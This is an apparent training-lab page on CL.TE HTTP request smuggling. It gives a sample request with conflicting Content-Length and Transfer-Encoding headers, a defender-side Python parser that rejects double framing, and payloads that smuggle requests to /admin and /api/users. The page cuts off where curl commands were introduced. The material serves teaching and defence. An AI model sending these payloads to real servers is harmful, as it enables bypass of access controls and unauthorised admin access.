Content-Length vs Transfer-Encoding parsing differences
This lab demonstrates a basic CL.TE (Content-Length vs Transfer-Encoding) HTTP Request Smuggling vulnerability. The frontend server uses Content-Length to determine the request body length, while the backend server uses Transfer-Encoding: chunked.
Objective: Send a malformed HTTP request that exploits the parsing difference between frontend and backend servers to smuggle additional requests.
// Vulnerable: Different parsing between frontend and backend
// Frontend uses Content-Length
// Backend uses Transfer-Encoding: chunked
// Example vulnerable request:

POST /1.php HTTP/1.1
Host: example.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

// Frontend sees: Content-Length: 13 (reads exactly 13 bytes of body: "0\r\n\r\nSMUGGLED")
// Backend sees: Transfer-Encoding: chunked (reads until the terminating 0\r\n\r\n chunk)
// Result: "SMUGGLED" is left on the connection and becomes the start of the next request
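To make the disagreement concrete from the defender's side, the following added example (not part of the lab's own code) parses the request above the way a Content-Length-only front end and a chunked-only back end would, and shows the check a hardened front end applies: a request carrying both framing headers is rejected rather than forwarded. Function names and the byte-string sample are constructed for this example.

```python
# Added example, not the lab's own code: parse the same raw request the way a
# Content-Length-only front end and a chunked-only back end would, then flag
# the double framing a hardened front end should reject instead of forwarding.

def split_head(raw: bytes):
    """Return (request line, headers with lowercased names, raw body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def body_by_content_length(raw: bytes) -> bytes:
    """Front-end view: exactly Content-Length bytes of body."""
    _, headers, body = split_head(raw)
    return body[:int(headers[b"content-length"])]

def body_by_chunked(raw: bytes):
    """Back-end view: decode chunks up to the 0-size chunk and its empty
    trailer line; return (decoded body, leftover bytes). Any leftover is what
    the back end would treat as the start of the *next* request."""
    _, _, body = split_head(raw)
    out, pos = b"", 0
    while True:
        eol = body.index(b"\r\n", pos)                # ValueError if truncated
        size = int(body[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            while True:                               # skip trailers to empty line
                eol = body.index(b"\r\n", pos)
                line, pos = body[pos:eol], eol + 2
                if not line:
                    return out, body[pos:]
        out += body[pos:pos + size]
        pos += size + 2                               # chunk data plus its CRLF

def is_ambiguous_framing(raw: bytes) -> bool:
    """Both Content-Length and Transfer-Encoding present: RFC 7230 s3.3.3 says
    this may indicate smuggling and ought to be handled as an error (400)."""
    _, headers, _ = split_head(raw)
    return b"transfer-encoding" in headers and b"content-length" in headers

# Constructed sample: the lab's CL.TE request as it would appear on the wire.
SMUGGLE = (b"POST /1.php HTTP/1.1\r\nHost: example.com\r\n"
           b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n"
           b"0\r\n\r\nSMUGGLED")
```

Running `body_by_content_length(SMUGGLE)` returns the full 13-byte body, while `body_by_chunked(SMUGGLE)` returns an empty body and `b"SMUGGLED"` as leftover, which is exactly the desynchronisation the lab describes; `is_ambiguous_framing` is the front-end check that prevents it.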
Try these payloads in the request body:

0\r\n\r\nSMUGGLED - Basic CL.TE payload
0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n - Admin access
0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin - API access
Use these curl commands to test the vulnerability: